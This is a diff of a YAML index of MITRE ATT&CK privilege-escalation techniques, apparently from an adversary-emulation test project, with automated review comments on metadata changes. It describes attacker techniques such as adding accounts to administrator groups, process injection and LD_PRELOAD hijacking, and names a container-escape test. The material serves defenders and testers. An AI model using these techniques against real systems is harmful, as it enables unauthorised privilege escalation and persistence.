x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -17023,11 +17291,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17107,7 +17374,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
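Review bot: the new T1098.007 block ends with `atomic_tests: []` but has no `identifier: T1098.007` line, whereas sibling entries in this same file (T1053.003, T1098.003, T1574.001, T1055.003) carry `identifier:` immediately before `atomic_tests:`; since a few other entries (T1053, T1548) also lack it, the generator seems to emit the key inconsistently, and it would be better to emit it for every technique or for none. Also note that the hunk merges the tail of T1053 (`+ atomic_tests: []`) with the whole new technique, so the trailing context `atomic_tests: []` belongs to T1098.007, not T1053, which is easy to misread; and the description carries a trailing space before `\n\n` after `for elevated privileges.`, which is upstream text but will show up as whitespace noise on every future diff.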
@@ -17130,7 +17467,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
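Review bot: `modified` for T1055.003 moves backwards here, from 2022-04-25 to 2021-10-18, and the same regression recurs in later hunks for T1546.011 (2022 to 2020), T1037.002, T1055, T1547.005 (2021 to 2020), T1543.004, T1546.005, T1574.006, T1134.002, T1548.001 and T1546.012. That pattern suggests this regeneration pulled from a different upstream snapshot than the previous one; please confirm which source was used, because a consumer that decides whether to refresh an entry by comparing `modified` timestamps would treat these as older records and skip them.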
@@ -17178,8 +17515,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
@@ -17211,7 +17546,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17266,13 +17601,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17333,9 +17666,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17344,7 +17677,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17397,7 +17729,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17418,12 +17750,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17526,7 +17857,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17626,7 +17956,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests:
- name: Deploy container using nsenter container escape
@@ -17795,7 +18124,7 @@ privilege-escalation:
rmdir #{mount_point}
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17808,7 +18137,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17821,7 +18149,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17851,7 +18178,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
@@ -17878,7 +18206,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17904,13 +18232,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17987,12 +18313,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -18011,6 +18336,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -18018,7 +18344,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -18038,34 +18363,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
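Review bot: most of this hunk is a reorder of `external_references` for T1574.008 (the `Microsoft WinExec` and `Microsoft Environment Property` entries only move position), with the real changes being the refreshed `Microsoft CreateProcess` retrieval date and learn.microsoft.com URL, the added `revoked: false`, and the spec version bump to 3.2.0. If the generator can preserve the upstream reference order, the diff for these periodic refreshes becomes much easier to review; as it stands, the `Windows NT Command Shell` entry still points at the docs.microsoft.com previous-versions URL while its neighbours moved to learn.microsoft.com, which is fine but worth noting so nobody treats it as missed.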
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -18101,6 +18428,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -18112,16 +18443,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -18157,12 +18484,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18170,14 +18497,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18192,6 +18518,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -18200,18 +18527,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -18243,9 +18570,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18317,7 +18641,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18344,7 +18667,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -18370,13 +18693,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -18497,12 +18818,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18534,11 +18854,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -18579,11 +18898,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -18639,12 +18957,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18701,7 +19018,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18771,7 +19087,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18881,7 +19196,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -18935,7 +19249,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18968,13 +19282,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
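Review bot: this hunk drops both spec_version and x_mitre_attack_spec_version: 2.1.0 from T1546.012 without adding a replacement, whereas the other objects in this file keep an x_mitre_attack_spec_version line; unless the field is re-added outside the visible context, T1546.012 ends up with no ATT&CK spec version at all. Worth checking that the generator emits the field for every technique rather than only where the upstream object already carried a 3.x value.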
@@ -19036,10 +19348,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
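Review bot: the platform list for T1548.005 replaces Azure AD, Office 365 and Google Workspace with Office Suite and Identity Provider; any index, filter or matrix CSV still keyed on the old platform names needs to change in the same PR, otherwise these techniques silently drop out of the per-platform indexes.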
@@ -19097,7 +19408,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -19139,7 +19449,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -19198,8 +19508,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -19229,7 +19537,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
